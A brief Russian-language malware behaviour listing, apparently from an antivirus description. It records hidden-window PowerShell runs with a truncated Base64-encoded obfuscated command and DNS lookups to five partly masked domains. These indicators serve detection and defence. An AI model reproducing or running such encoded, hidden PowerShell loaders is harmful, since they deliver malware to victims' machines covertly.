Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADkAOQAwADMAYwA5AHgAYwA5ADQAPQAnAGIAOQBiADcAMAB4AGMAeAB4ADIAMQAnADsAJABiADgAMgA5AGMAMQA3ADAAMAA...
- DNS ASK ro####bagger.com
- DNS ASK je#####eepayurveda.com
- DNS ASK ky####llection.com
- DNS ASK bi####atrading.com
- DNS ASK ai##ah.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADkAOQAwADMAYwA5AHgAYwA5ADQAPQAnAGIAOQBiADcAMAB4AGMAeAB4ADIAMQAnADsAJABiADgAMgA5AGMAMQA3ADAAMAA...' (со скрытым окном)